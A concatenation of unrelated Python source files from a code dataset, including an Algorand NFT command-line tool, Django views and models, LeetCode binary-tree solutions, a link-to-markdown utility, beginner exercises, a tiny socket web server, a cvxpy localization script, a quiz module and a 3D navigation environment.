|___|'.__.'\\'-;__/[___][___||__||__]\n ( ( __))\n by cusma \n \"\"\"\n\n\ndef poem():\n return r\"\"\"\n ,-----------------------------------------. \n (_\\ \\ \n | There was a time |\n | When nothing but Entropy was there. |\n | Then came the cryptographic Proof, |\n | And took it care. |\n | |\n | Verifiability of randomness, |\n | Since genesis block, |\n | Brings Consensus over realm vastness, |\n | So Algorand never fork. 
|\n _| |\n (_/___________________(*)___________________/\n \\\\ \n )) \n ^ \n \"\"\"\n\n\ndef main():\n if len(sys.argv) == 1:\n # Display help if no arguments, see:\n # https://github.com/docopt/docopt/issues/420#issuecomment-405018014\n sys.argv.append('--help')\n\n args = docopt(__doc__)\n\n print(title())\n\n if args['poem']:\n return print(poem())\n\n if args['verify-order']:\n return print(order_summary(verify_buy_order(args[''])))\n\n # Clients\n token = args['']\n header = {'X-Api-key': token}\n\n algod_client = algod.AlgodClient(\n algod_token=token,\n algod_address=ALGOD_ADDRESS,\n headers=header\n )\n\n indexer_client = indexer.IndexerClient(\n indexer_token=token,\n indexer_address=INDEXER_ADDRESS,\n headers=header\n )\n\n if args['dynasty']:\n print(\n r\"\"\"\n *** DYNASTY ***\n \"\"\"\n )\n return print(*['\\n', *history(indexer_client)])\n\n # Checking mnemonic format\n try:\n assert len(args[''].split()) == 25\n except AssertionError:\n quit('The mnemonic phrase must contain 25 words, '\n 'formatted as: \"word_1 word_2 ... word_25\"\\n')\n\n private_key = mnemonic.to_private_key(args[''])\n\n user = Account(\n account.address_from_private_key(private_key),\n private_key\n )\n\n if args['claim-crown']:\n opt_in(algod_client, user, CROWN_ID)\n\n name = args['']\n\n claim_nft(\n algod_client=algod_client,\n indexer_client=indexer_client,\n claimer=user,\n claim_arg='Crown',\n new_majesty=name,\n donation_amount=int(args['']),\n nft_id=CROWN_ID,\n )\n print(f\"\\n👑 Glory to {name}, the Randomic Majesty of Algorand! 🎉\\n\")\n\n elif args['claim-sceptre']:\n opt_in(algod_client, user, SCEPTRE_ID)\n\n name = args['']\n\n claim_nft(\n algod_client=algod_client,\n indexer_client=indexer_client,\n claimer=user,\n claim_arg='Sceptre',\n new_majesty=name,\n donation_amount=int(args['']),\n nft_id=SCEPTRE_ID,\n )\n print(\n f\"\\n🪄 Glory to {name}, the Verifiable Majesty of Algorand! 🎉\\n\")\n\n elif args['claim-card']:\n if algod_client.status()[\"last-round\"] <= ALGOREALM_CARD_FIRST_BLOCK:\n return print(\"🔐 The spell can be broken starting from the block \"\n f\"{ALGOREALM_CARD_FIRST_BLOCK}... ⏳\\n\")\n\n algorelm_card_contract = algod_client.account_info(\n CARD_CONTRACT.address\n )\n\n assets = algorelm_card_contract['assets']\n\n card_nft = list(filter(\n lambda asset: asset['asset-id'] == CARD_ID, assets))[0]\n\n if card_nft['amount'] == 0:\n return print(\"🔓 The enchanted coffer is empty! \"\n \"The AlgoRealm Special Card has been claimed!\\n\")\n\n opt_in(algod_client, user, CARD_ID)\n\n print(\"\\n✨ Whispering words of wisdom...\")\n claim_card(\n algod_client=algod_client,\n claimer=user\n )\n print(f\"\\n 📜 The spell has been broken! \"\n f\"The AlgoRealm Special Card is yours! 
🎉\\n\")\n\n if args['buy-order']:\n opt_in(algod_client, user, CARD_ID)\n\n amount = int(args[''])\n\n print(\n f\"✏️ Placing order of: {util.microalgos_to_algos(amount)} ALGO\\n\")\n\n seller = Account(\n address=current_owner(indexer_client, CARD_ID),\n private_key=''\n )\n\n trade_gtxn = card_order(\n algod_client=algod_client,\n buyer=user,\n seller=seller,\n price=amount\n )\n\n if args['--msg']:\n notify(algod_client, user, seller, trade_gtxn)\n\n return print(\n \"\\n📦 Send `trade.gtxn` file to the Seller to finalize the trade!\\n\"\n )\n\n if args['sell-card']:\n sell_card(algod_client, user)\n\n else:\n quit(\"\\nError: read AlgoRealm '--help'!\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"algorealm.py","file_name":"algorealm.py","file_ext":"py","file_size_in_byte":28667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"188613445","text":"import json\n\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.utils.translation import check_for_language, activate\n\nfrom contents.forms import ImageForm\nfrom contents.models import TextContent, FrontPageImage\n\n\ndef landing(request):\n\n return render(request, 'contents/landing.html', {\"images\": FrontPageImage.objects.all()})\n\n\ndef set_language(request):\n next_page = request.GET.get('next', None)\n\n lang_code = request.GET.get('lang', None)\n\n if not next_page:\n next_page = '/'\n else:\n next_page = next_page[3:]\n\n if lang_code and check_for_language(lang_code):\n activate(lang_code)\n next_page = '/' + lang_code + next_page\n\n response = HttpResponseRedirect(next_page)\n return response\n\n\ndef text_content(request, url):\n content = get_object_or_404(TextContent, url=url)\n return render(request, 'contents/content.html', {'content': content})\n\n\n@login_required\ndef administration(request):\n\n return render(request, 'contents/administration.html', {'text_content': TextContent.objects.all()})\n\n\n@login_required\ndef upload_image(request):\n res = {'status': \"Default error\"}\n if request.method == 'POST':\n form = ImageForm(request.POST, request.FILES)\n if form.is_valid():\n ins = form.save()\n ins.refresh_from_db()\n res['status'] = \"ok\"\n res['url'] = ins.get_absolute_url()\n\n return HttpResponse(json.dumps(res))\n\n\n@login_required\ndef model_form_upload(request):\n if request.method == 'POST':\n form = ImageForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return render(request, 'contents/landing.html', {\"images\": FrontPageImage.objects.all()})\n else:\n form = ImageForm()\n return render(request, 'contents/model_form_upload.html', {\n 'form': form\n })","sub_path":"navitas/contents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"68299647","text":"# APPROACH 1: Intermediate solution\n# Time Complexity : O(n^2), n: number of nodes\n# Space Complexity : O(n^2), n: number of nodes\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. Current Root will always be the first element of the current preorder array.\n# 2. 
Find the index of the root in inorder -> to know the left and right subtree elements.\n# 3. Then recursively call the function with left and right subtree elements of both inorder and preorder\n\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution:\n    def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n        \n        if len(preorder) == 0 or len(inorder) == 0:\n            return None\n        \n        root_val = preorder[0]\n        for ind in range(len(inorder)):\n            if inorder[ind] == root_val:\n                root_inorder_ind = ind\n                break  # values are unique, so stop at the first match\n        \n        preLeft = preorder[1 : root_inorder_ind + 1]\n        preRight = preorder[root_inorder_ind + 1 : ]\n        inLeft = inorder[ : root_inorder_ind]\n        inRight = inorder[root_inorder_ind + 1 : ]\n        \n        root = TreeNode(root_val)\n        root.left = self.buildTree(preLeft, inLeft)\n        root.right = self.buildTree(preRight, inRight)\n        \n        return root\n\n\n\n\n\n# APPROACH 2: Optimal solution\n# Time Complexity : O(n), n: number of nodes\n# Space Complexity : O(n), n: number of nodes\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : None \n#\n#\n# Your code here along with comments explaining your approach\n# 1. Instead of searching the root in inorder list each time, build a hashmap that stores the element and its position as key and value respectively.\n# 2. Instead of creating copies of array each time (left and right subtrees of preorder and inorder), maintain two pointers - start and end of inorder for current iteration.\n# 3. Preorder is used only for obtaining the root and we don't need to know the left and right subtree from it\n\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution:\n    def __init__(self):\n        self.root_preorder_ind = 0\n        self.hashmap_inorder = {}\n    \n    def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n        \n        if len(preorder) == 0 or len(inorder) == 0:\n            return None\n        \n        for ind in range(len(inorder)):\n            self.hashmap_inorder[inorder[ind]] = ind\n        \n        return self.helper(preorder, inorder, 0, len(inorder) - 1)\n    \n    \n    def helper(self, preorder, inorder, start, end):\n        if start > end:\n            return\n        \n        root_inorder_ind = self.hashmap_inorder[preorder[self.root_preorder_ind]]\n        self.root_preorder_ind += 1\n        \n        root = TreeNode(inorder[root_inorder_ind])\n        root.left = self.helper(preorder, inorder, start, root_inorder_ind - 1)\n        root.right = self.helper(preorder, inorder, root_inorder_ind + 1, end)\n        \n        return root\n","sub_path":"Problem-2_Construct_preorder_inorder.py","file_name":"Problem-2_Construct_preorder_inorder.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
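The comments above explain the hashmap optimization in the abstract; one tiny worked example may make the index bookkeeping concrete. It assumes the optimal Solution class above plus the TreeNode definition and List import that LeetCode normally supplies.

# preorder = [3, 9, 20, 15, 7], inorder = [9, 3, 15, 20, 7]
# preorder[0] = 3 is the root; in inorder, 3 splits [9] (left) from
# [15, 20, 7] (right), and hashmap_inorder[3] = 1 finds that split in O(1).
sol = Solution()
root = sol.buildTree([3, 9, 20, 15, 7], [9, 3, 15, 20, 7])
assert root.val == 3 and root.left.val == 9 and root.right.val == 20
assert root.right.left.val == 15 and root.right.right.val == 7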
models.DateField('Birthday', blank=True, null=True)\n location = models.CharField('Location', max_length=15, blank=True, null=True)\n website = models.URLField('Website', blank=True, null=True)\n following = models.ManyToManyField(\n to=User, \n blank=True, \n related_name='profile_followers'\n )\n followers = models.ManyToManyField(\n to=User,\n blank=True,\n related_name='profile_following'\n )\n\n \n def __str__(self):\n return f'{ self.display_name }'\n","sub_path":"twister/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9183213","text":"\"\"\" The shownoter module contains the core Shownoter functionality \"\"\"\n\nimport re\nimport requests\n\nfrom bs4 import BeautifulSoup\nfrom markdown import markdown\n\n\ndef format_links_as_hash(source):\n\n urls = link_detect(source)\n links = []\n\n for url in urls:\n url = url.lower()\n valid_link = True\n\n if image_detect(url):\n link = Image(url)\n\n else:\n link = Link()\n\n try:\n link.collect_data(url)\n except ValueError:\n valid_link = False\n continue\n\n if valid_link:\n entry = {\n 'url':link.url,\n 'title':link.title,\n 'markdown':link.markdown}\n links.append(entry)\n\n return links\n\ndef format_links_as_markdown(source):\n \"\"\" Wraps the shownoter functionality in a single function call \"\"\"\n urls = link_detect(source)\n links = []\n\n for url in urls:\n if image_detect(url):\n link = Image(url)\n else:\n link = Link()\n link.collect_data(url)\n\n links.append(link.markdown)\n\n output = links_to_string(links)\n return output.strip()\n\ndef link_detect(site):\n \"\"\" Returns a list of urls from a string\"\"\"\n re_link = re.compile(r'\\b\\S+\\.[a-zA-Z]{2,}\\S*', re.M)\n links = []\n\n for link in re.findall(re_link, site):\n \n if link not in links:\n links.append(link)\n \n return links\n\ndef get(link):\n \"\"\" A wrapper around requests.get to allow for easy mocking \"\"\"\n return requests.get(link, timeout=1.5, allow_redirects=False)\n\ndef image_detect(url):\n \"\"\"\n Determines is a string is an image.\n Returns true if it is an image.\n \"\"\"\n image_extension = ['.jpg', '.png', '.jpeg', '.gif']\n extension = re.search(r'\\.[a-zA-Z]{2,}$', url, re.M)\n\n if extension == None:\n return False\n\n if extension.group(0) in image_extension:\n return True\n\n return False\n\ndef parse_title(content, default_title=\"\"):\n \"\"\"Parses the title of a site from it's content\"\"\"\n if content == None:\n return default_title\n\n soup = BeautifulSoup(content, 'html.parser')\n if soup == None or soup.title == None:\n return default_title\n\n return soup.title.text\n\ndef link_markdown(title, url):\n \"\"\"Formats a generic link to a markdown list item link\"\"\"\n return '* [{}]({})'.format(title, url)\n\ndef image_markdown(title, url):\n \"\"\"Formats a link as an image\"\"\"\n return '* ![{}]({})'.format(title, url)\n\ndef request_content(site):\n \"\"\" Returns content or raises ValueError \"\"\"\n success = True\n\n try:\n request = get(site)\n except:\n # TODO insert some logging here requests.ConnectionError (or other) being trapped.\n raise ValueError(\"Url not found\")\n\n if request.status_code == 200:\n return request\n else:\n # TODO insert some logging here\n pass\n\n raise ValueError(\"Url not found\")\n\ndef possible_urls(url):\n \"\"\" Generator that returns possible variations of a given url \"\"\"\n if re.search(r'^\\w{3,5}://', url):\n yield url\n else:\n prefixes = 
['http://', 'https://', 'http://www.', 'https://www.']\n\n for prefix in prefixes:\n yield prefix+url\n\n\ndef valid_link(site):\n \"\"\"Returns the content of a website from a url\n\n If the first request fails it will attempt variations\n\n If all variations fail a ValueError is raised\"\"\"\n for url in possible_urls(site):\n try:\n return request_content(url)\n except ValueError:\n continue\n\n raise ValueError(\"No valid link permutation found\")\n\nclass Link():\n def collect_data(self, site):\n \"\"\" Collects the various information about the link \"\"\"\n self.site = valid_link(site)\n self.url = self.site.url\n self.title = parse_title(self.site.content) or site\n self.markdown = link_markdown(self.title, self.url)\n\n\nclass Image():\n \"\"\"Images are like links except they ignore connectivity tests.\"\"\"\n title = ''\n\n def __init__(self, site):\n self.url = site\n self.markdown = image_markdown(self.title, self.url)\n\ndef links_to_string(links):\n \"\"\"This function takes a list of objects and returns it as a string\"\"\"\n\n links_string = ''\n for link in links:\n links_string += link + '\\n'\n return links_string\n","sub_path":"app/shownoter.py","file_name":"shownoter.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116983688","text":"import math\nfrom operator import itemgetter\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q1 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef solve_ribuit(a, b, c):\n \"\"\"\n solve_ribuit(a, b, c):\n Solves the quadratic equation\n :param a: float, the X^2 coefficient\n :param b: float, the X coefficient\n :param c: float, the constant\n :return : tuple (first solve, second solve) or None if there is no real solve to the equation\n test 1: solve_ribuit(1, 5, 6) -> (-2.0, -3.0)\n test 2: solve_ribuit(1, 4, 5) -> None\n \"\"\"\n d = b ** 2 - 4 * a * c\n if d < 0:\n return None\n\n solve1 = (-b + math.sqrt(d)) / (2 * a)\n solve2 = (-b - math.sqrt(d)) / (2 * a)\n return solve1, solve2\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q2 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef str_start_end_same(s, n):\n \"\"\"\n str_start_end_same(s, n):\n Checks that the first n characters of the string are equals to the n last characters\n :param s: str, The string\n :param n: int, The start and end length\n :return: True iff the string is starts and end with the exact same n characters\n test 1: str_start_end_same('abcdab', 2) -> True\n test 2: str_start_end_same('abcdab', 3) -> False\n \"\"\"\n return s[0:n] == s[-n:]\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q3 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef get_ribua_num(a, b):\n \"\"\"\n get_ribua_num(a, b):\n Calculated the value of the [a,b] cell\n :param a: Row\n :param b: Column\n :returns Number: The calculated value of the [a,b] cell\n test 1: get_ribua_num(1,1) -> 1\n test 2: get_ribua_num(3,3) -> 6\n test 3: get_ribua_num(3,5) -> 15\n \"\"\"\n return 1 if a == 1 or b == 1 else get_ribua_num(a - 1, b) + get_ribua_num(a, b - 
1)\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q4 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef how_is_string(s):\n \"\"\"\n how_is_string(s):\n :param s: str, the string\n :return: 1 if the string contains only characters which are letters or numbers,\n 2 if all the characters are numbers,\n 3 if all the characters are letters,\n else 0\n test 1: how_is_string('asd213%') -> 0\n test 2: how_is_string('asd213') -> 1\n test 3: how_is_string('213') -> 2\n test 4: how_is_string('abcdef') -> 3\n \"\"\"\n digit_found, letter_found = False, False\n\n if not s.isalnum():\n return 0\n\n for char in s:\n if char.isdigit():\n digit_found = True\n if char.isalpha():\n letter_found = True\n\n if digit_found and letter_found:\n return 1\n elif digit_found:\n return 2\n else:\n return 3\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q5 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef str_only_letters(s):\n \"\"\"\n str_only_letters(s):\n Returns the same string without any character that is not a letter\n :param s: str, The original string\n :return: The string without any non-characters letters\n test 1: str_only_letters('this is a nice string ( ‘hhhhh’ ), but we want it with only letters') -> 'thisisanicestringhhhhhbutwewantitwithonlyletters'\n test 2: str_only_letters('avielasaf') -> 'avielasaf'\n \"\"\"\n output = \"\"\n for c in s:\n output += c if c.isalpha() else \"\"\n return output\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q6 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\ninvalid_chars = {',', '.', '(', ')', '/', '-', \"'\"}\ninvalid_words = {\"and\", \"or\", \"the\", \"to\", \"of\", \"not\", \"in\", \"for\", \"while\", \"if\", \"as\", \"equal\", \"a\", \"c\", \"it\", \"is\",\n \"are\", \"an\", \"also\", \"with\"}\n\n\ndef clear_chars(string, chars):\n for char in chars:\n if char in string:\n string = string.replace(char, ' ')\n return string\n\n\ndef get_top_used_words_from_file(sFile, n):\n \"\"\"\n get_top_used_words_from_file(sFile, n):\n Returns the top used words from file\n :param sFile: The path to the file\n :param n: Top n words to return\n :return: Returns the top used words from file\n test 1: get_top_used_words_from_file(\"textfile.txt\", 3) -> [('python', 14), ('language', 6), ('interpreter', 4)]\n test 2: get_top_used_words_from_file(\"textfile.txt\", 2) -> [('python', 14), ('language', 6)]\n \"\"\"\n word_dict = {}\n with open(sFile, 'r') as f:\n for line in f:\n line = clear_chars(line, invalid_chars)\n for word in line.lower().split():\n if word not in invalid_words: word_dict[word] = word_dict.get(word, 0) + 1\n sorted_items = sorted(word_dict.items(), key=itemgetter(1), reverse=True)\n print(sorted_items[:n])\n\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q7 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\ns_females = {1, 2, 3, 4, 11, 12}\ns_males = {5, 6, 7, 8}\ns_all = s_females.union(s_males)\ns_natives = {3, 11, 7, 5}\ns_telaviv = {1, 2, 5, 6}\ns_haifa = {3, 7, 8, 11}\ns_jerusalem = 
s_all.difference(s_telaviv.union(s_haifa))\ns_not_tel_aviv = s_all.difference(s_telaviv)\ns_males_telaviv = s_males.intersection(s_telaviv)\ns_females_telaviv_or_Haifa = s_females.intersection(s_telaviv.union(s_haifa))\ns_are_males_in_Jerusalem = len(s_jerusalem.intersection(s_males)) > 0\ns_are_females_not_natives_in_Jerusalem = len(s_females.difference(s_natives).intersection(s_jerusalem)) > 0\n\n\"\"\"--------------------------------------------------------------------\n#------------------- Q8 ---------------------------------------------\n--------------------------------------------------------------------\"\"\"\n\n\ndef _calc(n1, n2, operator):\n    if operator not in {\"+\", \"*\", \"-\", \"/\"}:\n        raise TypeError(\"Expected +, /, - or * but got \" + operator)\n    return eval(str(n2) + operator + str(n1))\n\n\ndef eval_post_fix(s):\n    \"\"\"\n    eval_post_fix(s):\n    Evaluate the expression value\n    :param s: str, The post fix expression\n    :return: The value of the expression or None if the input was incorrect\n    test 1: eval_post_fix(\"3 4 + 9 5 - *\") -> 28\n    test 2: eval_post_fix(\"3 4 + 9 5 - ^\") -> Expected +, /, - or * but got ^ At char number 7\n    test 3: eval_post_fix(\"3 4 + 9 5 - 4\") -> Invalid input\n    \"\"\"\n    stack = []\n    for i, e in enumerate(s.split(\" \"), 1):\n        try:\n            stack.append(e) if e.isdigit() else stack.append(_calc(int(stack.pop()), int(stack.pop()), e))\n        except TypeError as e:\n            print(e, \"At char number\", i)\n            return None\n        except:\n            print(\"Problem at char number\", i)\n            return None\n    if len(stack) != 1 or not isinstance(stack[0], int):\n        print(\"Invalid input\")\n        return None\n\n    return stack.pop()","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":7504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"17070126","text":"#Python Code for the Web Server\r\n#import socket module\r\nfrom socket import * \r\n\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\n#Prepare a server socket\r\nserverPort = 15000\r\nserverSocket.bind(('',serverPort))\r\nserverSocket.listen(1);\r\nprint('Ready to serve...')\r\nrequest_count = 0\r\nwhile True:\r\n    #Establish the connection\r\n    connectionSocket, addr = serverSocket.accept(); \r\n    try:\r\n        request = connectionSocket.recv(2048) \r\n        if (request):\r\n            print (request)\r\n            filename = request.decode('UTF-8').split()[1] \r\n            f = open(filename[1:]) \r\n            outputdata = f.read()\r\n            # outputdata = bytes(outputdata,'UTF-8')\r\n            #Send one HTTP header line into socket\r\n            header = bytes(\"HTTP/1.1 200 OK\\r\\n\\r\\n\",'UTF-8')\r\n            connectionSocket.send(header) \r\n            \r\n            #Send the content of the requested file to the client\r\n            # for i in range(0, len(outputdata)):\r\n            #     connectionSocket.send(bytes(outputdata[i],'UTF-8'))\r\n            connectionSocket.send(bytes(outputdata,'UTF-8'))\r\n            request_count = request_count + 1\r\n            \r\n            #close the socket\r\n            print(\"served \", request_count, \" requests.\")\r\n            connectionSocket.close()\r\n    except IOError: \r\n        #Send response message for file not found\r\n        header = bytes(\"HTTP/1.1 404 Not Found\\r\\n\\r\\n\",'UTF-8')\r\n        connectionSocket.send(header) \r\n        \r\n        #Close client socket\r\n        connectionSocket.close() \r\nserverSocket.close()\r\n","sub_path":"1_WebServer/WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"177380806","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 22 09:49:18 2018\n\n@author: josephhiggins\n\"\"\"\n\nimport cvxpy as cvx\nimport numpy as np\n\ndef sum_elem_product(A,B):\n    return cvx.sum_entries(cvx.mul_elemwise(A, B))\n\ndef col_vec_3elem(a,b,c):\n    return np.matrix([[a],[b],[c]])\n\n# Constraints will force Z to look like what it's supposed to look like here\nZ = cvx.Semidef(3)\n\nsensor_location = [1000,1000]\n\nanchors = np.matrix([\n    [ 1, 0],\n    [-1, 0],\n    [ 0, 2]\n])\n\nd = list(map(lambda a: np.linalg.norm(sensor_location - a), anchors))\n\nobjective = cvx.Minimize(0)\n\nv0 = col_vec_3elem(1,0,0)\nv1 = col_vec_3elem(0,1,0)\nv2 = col_vec_3elem(1,1,0)\n\na0 = col_vec_3elem(anchors[0,0],anchors[0,1],-1)\na1 = col_vec_3elem(anchors[1,0],anchors[1,1],-1)\na2 = col_vec_3elem(anchors[2,0],anchors[2,1],-1)\n\nconstraints = [\n    sum_elem_product(v0*np.transpose(v0), Z) == 1,\n    sum_elem_product(v1*np.transpose(v1), Z) == 1,\n    sum_elem_product(v2*np.transpose(v2), Z) == 2,\n    sum_elem_product(a0*np.transpose(a0), Z) == cvx.square(d[0]),\n    sum_elem_product(a1*np.transpose(a1), Z) == cvx.square(d[1]),\n    sum_elem_product(a2*np.transpose(a2), Z) == cvx.square(d[2])\n]\n\nprob = cvx.Problem(objective, constraints)\n\n# The optimal objective is returned by prob.solve().\nresult = prob.solve(solver = 'MOSEK')\n# The optimal value for x is stored in x.value.\nprint(Z[0,2].value)\nprint(Z[1,2].value)\n\n\n\n\n\n\n\n\n","sub_path":"HW2/Q9b.py","file_name":"Q9b.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"535557589","text":"import random\n\n\nclass QuizAnswer():\n    def __init__(self, answer: str, correct: bool):\n        self.answer = answer\n        self.correct = correct\n\n    def __str__(self):\n        qa = self.answer\n        if (self.correct):\n            qa += \": Correct Answer\"\n        return qa\n\n    def __repr__(self):\n        return self.__str__()\n\n\nclass QuizQuestion():\n    question: str\n    answers: list[QuizAnswer]\n\n    def __init__(self, question: str):\n        self.question = question\n        self.answers = []\n\n    def __str__(self):\n        qs = \"\\n\\nQuestion: \" + self.question + \\\n            \"\\n\\nAnswers: \" + str(self.answers)\n        # for aq in self.answers:\n        #     qs += \"\\n\\n\"\n        #     qs += str(aq)\n        return qs\n\n    def __repr__(self):\n        return self.__str__()\n\n    def add_answer(self, answer: QuizAnswer):\n        self.answers.append(answer)\n\n    def correct_answer(self) -> str:\n        letter = 'a'\n        for qa in self.answers:\n            if qa.correct:\n                return letter\n            letter = chr(ord(letter)+1)\n        return letter\n\n\nclass Quiz():\n    @staticmethod\n    def quiz_list_from_config(config: dict) -> list[QuizQuestion]:\n        questions: list[QuizQuestion] = []\n        for question in config:\n            qq = QuizQuestion(question)\n            all = None\n            for answer in config[question]:\n                if answer[0] == '*':\n                    answer = answer[1:]\n                    if answer.startswith('#ALL'):\n                        all = QuizAnswer('All of the above', True)\n                    else:\n                        qa = QuizAnswer(answer, True)\n                        qq.add_answer(qa)\n                elif answer.startswith('#ALL'):\n                    all = QuizAnswer('All of the above', False)\n                else:\n                    qa = QuizAnswer(answer, False)\n                    qq.add_answer(qa)\n            random.shuffle(qq.answers)\n            if all:\n                qq.add_answer(all)\n            questions.append(qq)\n        random.shuffle(questions)\n        return questions\n\n    # Prints question in a format for display\n    @staticmethod\n    def to_pretty_string(qq: QuizQuestion) -> str:\n        pp = qq.question + \"\\n\"\n        letter = 'a'\n        for qa in qq.answers:\n            pp += \"\\t\" + letter + \") \" + qa.answer + \"\\n\"\n            letter = chr(ord(letter)+1)\n        return 
pp\n","sub_path":"quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460101056","text":"import cv2\nimport copy\nimport gym\nimport numpy as np\nfrom blox import AttrDict\nfrom gcp.planning.infra.envs.miniworld_env.base_miniworld_env import BaseMiniworldEnv\nfrom gcp.planning.infra.envs.miniworld_env.utils.multiroom2d_layout import define_layout, draw_layout_overview, \\\n default_texture_dir\nfrom gcp.planning.infra.envs.miniworld_env.utils.sampling_fcns import RoomSampler2d\nimport numbers\n\n\ndef fcn_apply(fcn, arg):\n return lambda: fcn(arg())\n\n\nclass Multiroom3dEnv(BaseMiniworldEnv):\n def __init__(self, hp, reset_state=None, no_env=False, crop_window=None):\n self._hp = self._default_hparams()\n for name, value in hp.items():\n print('setting param {} to value {}'.format(name, value))\n self._hp.set_hparam(name, value)\n super().__init__(self._hp)\n\n self._texture_dir = default_texture_dir()\n self._rooms_per_side = int(np.sqrt(self._hp.n_rooms))\n self._layout = define_layout(self._rooms_per_side, self._texture_dir)\n self._topdown_render_scale = 256 # table_size * scale = px size of output render img\n self._static_img_topdown = draw_layout_overview(self._rooms_per_side,\n self._topdown_render_scale,\n texture_dir=self._texture_dir)\n self._crop_window = crop_window\n if crop_window is not None:\n # top-down rendering will get cropped -> pad static background\n padded_bg = np.zeros((self._static_img_topdown.shape[0] + 2 * crop_window,\n self._static_img_topdown.shape[1] + 2 * crop_window, 3), dtype=self._static_img_topdown.dtype)\n padded_bg[crop_window:-crop_window, crop_window:-crop_window] = self._static_img_topdown\n self._static_img_topdown = padded_bg\n\n self._adim, self._sdim = 2, 3\n if not no_env:\n import gym_miniworld # keep! 
important for env registration\n self.env = gym.make(\"MiniWorld-Multiroom3d-v0\",\n obs_height=self._hp.obs_height,\n obs_width=self._hp.obs_width,\n rooms_per_side=self._rooms_per_side,\n doors=self._layout.doors,\n heading_smoothing=self._hp.heading_smoothing,\n layout_params=AttrDict(room_size=self._layout.room_size,\n door_size=self._layout.door_size,\n textures=self._layout.textures))\n\n # Define the sample_*_state method by looking up the function with the corresponding name\n self.state_sampler = RoomSampler2d(self._rooms_per_side)\n self.current_pos = None\n self.goal_pos = None\n self.prm_policy = None # used to compute shortest distance between pos and goal\n\n def _default_hparams(self):\n default_dict = {\n 'obs_height': 300,\n 'obs_width': 400,\n 'goal_pos': None,\n 'init_pos': None,\n 'n_rooms': 9,\n 'heading_smoothing': 0.2, # how much of new angle is taken into average\n }\n parent_params = super()._default_hparams()\n for k in default_dict.keys():\n parent_params.add_hparam(k, default_dict[k])\n return parent_params\n\n def reset(self, reset_state):\n super().reset()\n\n if reset_state is None:\n start_pos = self.env.mj2mw(self.state_sampler.sample(self._hp.init_pos))\n start_angle = 2 * np.pi * np.random.rand()\n goal_pos = self.env.mj2mw(self.state_sampler.sample(self._hp.goal_pos))\n else:\n start_pos = reset_state[:2]\n start_angle = reset_state[2]\n goal_pos = reset_state[-2:]\n\n reset_state = AttrDict(start_pos=start_pos,\n start_angle=start_angle,\n goal=goal_pos)\n\n img_obs = self.env.reset(reset_state)\n self.goal_pos = goal_pos\n qpos_full = np.concatenate((start_pos, np.array([start_angle])))\n\n obs = AttrDict(images=np.expand_dims(img_obs, axis=0), # add camera dimension\n qpos_full=qpos_full,\n goal=goal_pos,\n env_done=False,\n state=np.concatenate((qpos_full, goal_pos)),\n topdown_image=self.render_pos_top_down(qpos_full, self.goal_pos)\n )\n self._post_step(start_pos)\n self._initial_shortest_dist = self.comp_shortest_dist(start_pos, goal_pos)\n return obs, reset_state\n\n def get_reset_from_obs(self, obs_dict):\n return obs_dict['state'][0]\n\n def get_goal_from_obs(self, obs_dict):\n self.goal = obs_dict['goal'][-1]\n return self.goal\n\n def step(self, action):\n img_obs, reward, done, agent_pos = self.env.step(action)\n obs = AttrDict(images=np.expand_dims(img_obs, axis=0), # add camera dimension\n qpos_full=agent_pos,\n goal=self.goal_pos,\n env_done=done,\n 